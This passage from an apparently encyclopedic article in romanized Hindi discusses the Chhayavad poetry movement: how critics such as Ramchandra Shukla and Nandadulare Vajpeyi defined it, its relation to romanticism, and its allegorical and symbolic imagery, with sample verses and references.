aur kah chale ki bangala mean bhi in kavitaoan ko chhayavad kahate the.

bangala mean chhayavad

bangala mean chhayavad namak koee vad ya shabd hai ya nahian, isaki chhanabin karana unaka prayojan n tha. unhean to apani bat rakhani thi, rakh di. bhale hi vah galat ho ya thik. yah pravad ki bangala mean bhi 'chhayavad' namak ek vad hai, bahut dinoan bad hajari prasad dvivedi dvara nirmool hua. tatpary yah ki ramachandr shukl ne 'chhayavad' ki keval adhyatmik kavitaoan ko apane drishti-path mean rakha aur isilie rahasyavad ko chhayavadi kavitaoan ki vishayavastu kaha. unaka yah vichar aant tak bana raha. shesh ko yah shaili-matr manate the. jis tarah achary mahavir prasad dvivedi 'chhayavad' ko ‘anyokti-paddhati’ samajhate the, usi tarah achary shukl bhi use shaili manate the, jisamean ‘anyokti’ ke atirikt bhi kee prakar ki shailiyoan ka samavesh tha. age chalakar alochakoan ne shukl ji dvara pravartit is 'dvaitavad' ko samapt karate hue sthapit kiya ki bhav ke kshetr mean jo rahasyavad hai, vahi shaili mean lakshanik vakrata, anyokti-vidhan, aprastut yojana adi roopoan mean vyakt hota hai. is tarah inhoanne rahasyavadi vishay aur lakshanik shaili donoan ko ek kar diya. is samanvit roop ko jayashankar prasad ne 'rahasyavad' nam diya aur nandadulare vajapeyi ne 'chhayavad'.[1]

nandadulare vajapeyi ki paribhasha

vajapeyi ji ka bhi 'chhayavad' adhyatmik hi hai. hindi sahity : bisavian shatabdi namak pustak ke 'mahadevi varma' shirshak nibandh mean 'chhayavad' ki paribhasha dete hue ve kahate haian ki- "manav athava prakriti ke sookshm kiantu vyakt sauandary mean adhyatmik chhaya ka bhan mere vichar se chhayavad ki ek sarvamany vyakhya ho sakati hai." vajapeyi ji ki adhyatmik chhaya shukl ji ka ‘phaiantasamaita’ athava chhayabhas hi hai, keval is aantar ke sath ki usamean dharmik sthoolata nahian hai. apane ko is paribhasha mean baandhakar vajapeyi ji ne jayashankar prasad, sumitranandan pant, sooryakaant tripathi 'nirala', mahadevi varma ki bahut-si kavitaoan ko chho d diya. unhoanne apani paribhasha ka nirman chhayavadi kaviyoan ki keval ek tarah ki kavitaoan ke adhar par kiya. vajapeyi ji ki is paribhasha ke pichhe shaantipriy dvivedi, mahadevi varma, nageandr adi ki yah prachalit dharana bhi hai ki chhayavad sthool ke viruddh sookshm ka vidroh hai. chhayavad mean niahsandeh sookshmata kaphi hai, lekin is sookshmata ki sima ke karan ham nirala aur prasad ki un kavitaoan se vanchit rah jate haian, jinamean ativ maansalata hai. isalie is paribhasha mean spasht hi avyapti dosh hai. jo ho, in tamam batoan se maloom hota hai ki shuroo-shuroo mean jis aspashtata ke lie 'chhayavad' shabd chalaya gaya, vahi tho da nam badalakar mukutadhar paandey aur achary shukl se hoti huee nandadulare vajapeyi aur nageandr tak aee aur ab bhi anek vidyarthiyoan ka sanskar ban gee hai. sushil kumar ki aspashtata, mukutadhar ki adhyatmikata, achary dvivedi ka rahasy, shukl ji ka adhyatmik chhayabhas, vajapeyi ji ka ‘adhyatmik chhaya ka bhan’ aur nageandr ka ‘sthool ke prati sookshm ka vidroh’ sab ek-se hi chiantan kram mean haian.

shuklaji ka svachchhandatavad

chhayavadi kavitaoan ki alochana-pratyalochana ke silasile mean jis samay aangrezi ka ‘mistisijm’ shabd aya, usake kuchh hi din bad ‘romaitisijm’ shabd a gaya. ramachandr shukl ne isaka hindi anuvad svachchhandatavad kiya aur shridhar pathak, ramanaresh tripathi adi ko svachchhandatavadi kavi kaha. is tarah shukl ji ne ‘svachchhandatavad’ aur ‘chhayavad’ mean aantar kiya. ve chhayavad ko ‘romaiantisijm’ kahane ke paksh mean nahian the. ashchary ki bat hai ki prasad, pant, nirala ki shaili ityadi se prabhavit manate hue bhi shukl ji unhean romaiantik manane se inakar karate the. parantu yahaan bhi shukl ji ka dvaitavad n chal saka. kavi, alochak aur samany pathak 'chhayavad' ko romaiantisijm ka paryay samajhane lage. kuchh log shukl ji dvara gadhe hue 'svachchhandatavad' ko bhi 'chhayavad' ka paryay athava aang manane lage tatha any log 'chhayavad' ko 'svachchhandatavad' ka dvitiy utthan kahana adhik yukti sangat manane lage the.

anyoktipaddhati ka avalanban

chitrabhasha shaili ya pratik paddhati ke aantargat jis prakar vachak padoan ke sthan par lakshak padoan ka vyavahar ata hai, usi prakar prastut ke sthan par usaki vyanjana karane vale aprastut chitroan ka vidhan bhi. at: anyoktipaddhati ka avalanban bhi 'chhayavad' ka ek vishesh lakshan hua. jaisa ki kaha gaya hai ki 'chhayavad' ka chalan 'dvivedi yug' ki rookhi itivrittatmakata ki pratikriya ke roop mean hua tha. at: is pratikriya ka pradarshan keval lakshan aur anyokti ke prachury ke roop mean hi nahian, kahian-kahian upama aur utpreksha ki bharamar ke roop mean bhi hua. inamean se upadan aur lakshan lakshanaoan ko chho d aur sab batean kisi n kisi prakar ki samy bhavana ke adhar par hi kh di hone vali haian. samy ko lekar anek prakar ki alankrit rachanaean bahut pahale bhi hoti thian tatha 'ritikal' ke aur usake pichhe bhi hoti rahi haian. at: 'chhayavad' ki rachanaoan ke bhitar samy grahan ki us pranali ka niroopan avashyak hai, jisake karan use ek vishisht roop prapt hua.[3]

rachanaean

'chhayavad' ki rachanaean gitoan ke roop mean hi adhikatar hoti haian. isase unamean anviti kam dikhaee p dati hai. jahaan yah anviti hoti hai, vahaan samoochi rachana anyokti paddhati par ki jati hai. is prakar samy bhavana ka hi prachury ham sarvatr pate haian. yah samy bhavana hamare hriday ka prasar karane vali, shesh srishti ke sath manushy ke goodh sanbandh ki dharana bandhane vali, atyant apekshit manobhoomi hai, isamean sandeh nahian, par yah sachcha marmik prabhav vahian utpann karati hai, jahaan yah prakritik vastu ya vyapar se prapt sachche abhas ke adhar par kh di hoti hai. prakriti apane anant roopoan aur vyaparoan ke dvara anek batoan ki goodh va agoodh vyanjana karati rahati hai. is vyanjana ko n parakhakar ya n grahan karake jo samy vidhan hoga, vah manamana arop matr hoga. is anant vishv mahakavy ki vyanjanaoan ki parakh ke sath jo samy vidhan hota hai, vah marmik aur udbodhak hota hai, jaise- 

dukhadava se navaankur pata jag jivan ka van
karunardr vishv ka garjan barasata navajivan kan.
khul khul nav ichchhaean phailati jivan ke dal. 
yah shaishav ka saral has hai, sahasa ur mean hai a jata. 
yah oosha ka navavikas hai, jo raj ko hai rajat banata. 
yah laghu laharoan ka vilas hai, kalanath jisamean khianch ata.

samy

hamare yahaan samy mukhyat: tin prakar ka mana gaya hai-

  1. sadrishy - roop ya akar ka samy
  2. sadharmy - gun ya kriya ka samy
  3. shabdasamy - dobhinn vastuoan ka ek hi nam hona.

isamean se aantim to shlesh ki shabd kri da dikhane valoan ke hi kam ka hai. rahe sadrishy aur sadharmy. vichar karane par in donoan mean prabhav samy chhipa milega. siddh kaviyoan ki drishti aise hi aprastutoan ki or jati hai, jo prastutoan ke saman hi sauandary, dipti, kaanti, komalata, prachandata, bhishanata, ugrata, udasi, avasad, khinnata ityadi ki bhavana jagate haian. kavy mean bandhe chale ate hue upaman adhikatar isi ke haian. keval roop rang, akar ya vyapar ko oopar se dekhakar ya nap jokhakar, bhavana par unaka prabhav parakhe bina ve nahian rakhe jate the. pichhe kavi karm ke bahut kuchh shramasadhy ya abhyasagamy hone ke karan jab kritrimata ane lagi, tab bahut se upaman keval bahari nap jokh ke anusar bhi rakhe jane lage. kati ki sookshmata dikhane ke lie sianhani aur bhi d samane laee jane lagi.[3]

kavy shaili ki visheshata

'chhayavad' b di sahridayata ke sath prabhav samy par hi vishesh lakshy rakhakar chala hai. kahian-kahian to bahari sadrishy ya sadharmy atyant alp ya n rahane par bhi abhyantar prabhav samy lekar aprastutoan ka sannivesh kar diya jata hai. aise aprastut adhikatar upalakshan ke roop mean ya pratikavat hote haian, jaise- sukh, anand, praphullata, yauvan kal ityadi ke sthan par unake dyotak usha, prabhat, madhukal, priya ke sthan par mukul; premi ke sthan par madhup; shvet ya shubhr ke sthan par kuand, rajat; madhury ke sthan par madhu; diptiman ya kaantiman ke sthan par svarn; vishad ya avasad ke sthan par aandhakar, aandheri rat, sandhaya ki chhaya, patajh d, manasik akulata ya kshobh ke sthan par jhanjha, toophan, bhavatarang ke lie jhankar, bhavaprravah ke lie sangit ya murali ka svar ityadi. abhyantar prabhav samy ke adhar par lakshanik aur vyanjanatmak paddhati ka pragalbh aur prachur vikas 'chhayavad' ki kavy shaili ki asali visheshata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 1.3 chhayavad (hindi). . abhigaman tithi: 01 aktoobar, 2013.
  2. phaiantasamata
  3. 3.0 3.1 3.2 chhayavad (hindi). . abhigaman tithi: 01 aktoobar, 2013.
  4. mahakavy aur prabandh kavy, jinamean kisi katha ka varnan hota hai.
  5. chhayavad- rashtravad ka saanskritik aur bhavanatmak daur (hindi). . abhigaman tithi: 01 aktoobar, 2013.

sanbandhit lekh